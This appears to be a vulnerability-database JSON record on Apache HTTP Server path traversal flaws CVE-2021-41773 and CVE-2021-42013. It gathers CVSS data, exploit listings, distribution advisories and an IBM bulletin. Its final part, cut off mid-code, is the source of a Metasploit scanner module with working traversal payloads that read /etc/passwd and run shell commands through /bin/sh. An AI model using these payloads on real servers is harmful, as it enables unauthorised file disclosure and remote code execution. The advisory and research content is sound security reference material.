"integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T05:34:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-15T12:00:37", "id": "ECD5D758-774C-5488-B782-C8996208B401", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-20T14:41:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T13:15:51", "id": "C0380E16-C468-5540-A427-7FE34E7CF36B", "href": "", "cvss": 
{"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-10-29T18:03:53", "description": "# CVE-2021-41773\n## \ud83d\udc1b Path traversal and file disclosure vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-15T21:38:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-10-27T01:04:25", "id": "987C6FDB-3E70-5FF5-AB5B-D50065D27594", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-28T04:29:09", "description": "# Vulnerable docker images for CVE-2021-41773 Apache path traver...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 3.6}, "published": "2021-10-06T14:47:23", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-06-28T04:02:32", "id": "B4483895-BA86-5CFB-84F3-7C06411B5175", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-11-08T20:17:44", "description": "# cve-2021-41773-nse\n#By George Labrin (@creadpag)\n## \n\n[![N|Sol...", "cvss3": {}, "published": "2021-10-06T05:22:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T05:24:35", "id": "B8198D62-F9C8-5E03-A301-9A3580070B4C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# Usage\nfile `ip-p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T08:10:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache 
Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:59:44", "id": "A1FF76C0-CF98-5704-AEE4-DF6F1E434FA3", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-25T10:34:43", "description": "# ScaRCE Framework - CVE-2021-41773 Hunter\n[ | Ubuntu wasn't vulnerable to CVE-2021-41773 so we did not deploy the insufficient fix.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", 
"CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "UB:CVE-2021-42013", "href": "https://ubuntu.com/security/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:15:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP\nServer 2.4.49. An attacker could use a path traversal attack to map URLs to\nfiles outside the directories configured by Alias-like directives. If files\noutside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue is known to be exploited in the wild.\nThis issue only affects Apache 2.4.49 and not earlier versions. The fix in\nApache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], 
"modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41773", "href": "https://ubuntu.com/security/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:15:20", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected\nduring HTTP/2 request processing, allowing an external source to DoS the\nserver. This requires a specially crafted request. The vulnerability was\nrecently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41524", "href": "https://ubuntu.com/security/CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2022-10-01T01:44:38", "description": "## Summary\n\nIBM Rational Build Forge version 8.0.x is affected by CVE-2021-42013\n\n## Vulnerability Details\n\n** CVEID: 
**[CVE-2021-42013](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>) \n** DESCRIPTION: **Apache HTTP Server could allow a remote attacker to execute arbitrary code on the system caused by a path traversal vulnerability related to an incomplete fix for CVE-2021-41773 when mod_cgi is enabled. By uploading a file and setting permissions, an attacker could exploit this vulnerability to execute arbitrary code on the system with Apache user privileges. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/210764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/210764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nBuild Forge| 8.0 - 8.0.0.20 \n \n\n\n## Remediation/Fixes\n\nYou must download the fix pack specified in the following table and apply it. \n\n**Affected Supporting Product(s)**\n\n| \n\n**Remediation/Fix** \n \n---|--- \n \nIBM Rational Build Forge 8.0 to 8.0.0.20\n\n| \n\n[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.21&source=SAR> \"Download\" ) IBM Rational Build Forge 8.0.0.21.\n\nThe fix includes Apache-HTTP-Server-2.4.52 \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 
Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU037\",\"label\":\"HCL Technologies\"},\"Product\":{\"code\":\"SS2MGB\",\"label\":\"Rational Build Forge family\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.0.0.21\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-17T18:38:24", "type": "ibm", "title": "Security Bulletin: IBM Rational Build Forge 8.0.x is affected by Apache HTTP Server version used in it. 
(CVE-2021-42013)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-17T18:38:24", "id": "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2", "href": "https://www.ibm.com/support/pages/node/6541330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-01-23T06:03:36", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 
The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41773", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T06:03:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. 
This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "debiancve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:15:00", "id": "DEBIANCVE:CVE-2021-42013", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-23T06:03:36", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. 
No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41524", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T10:46:09", "description": "This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). 
This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T17:00:59", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-22T16:38:03", "id": "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE scanner',\n 'Description' => %q{\n This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not 
protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Actions' => [\n [\n 'CHECK_TRAVERSAL',\n {\n 'Description' => 'Check for vulnerability.'\n }\n ],\n [\n 'CHECK_RCE',\n {\n 'Description' => 'Check for RCE (if mod_cgi is enabled).'\n }\n ],\n [\n 'READ_FILE',\n {\n 'Description' => 'Read file on the remote server.'\n }\n ]\n ],\n 'DefaultAction' => 'CHECK_TRAVERSAL'\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('FILEPATH', [false, 'File you want to read', '/etc/passwd']),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def exec_traversal(cmd)\n 
send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => normalize_uri(datastore['TARGETURI'], @traversal.to_s),\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{cmd}\"\n })\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def read_traversal\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(@target_uri, @traversal.to_s)\n })\n end\n\n def run_host(ip)\n @proto = (ssl ? 'https' : 'http')\n\n case action.name\n when 'CHECK_TRAVERSAL'\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << '/etc/passwd'\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?('root:x:0:0:')\n print_good(message(\"The target is vulnerable to #{datastore['CVE']}.\"))\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']}.\"))\n\n return Exploit::CheckCode::Safe\n when 'CHECK_RCE'\n @traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n rand_str = Rex::Text.rand_text_alpha(4..8)\n\n response = exec_traversal(\"echo #{rand_str}\")\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?(rand_str)\n print_good(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return 
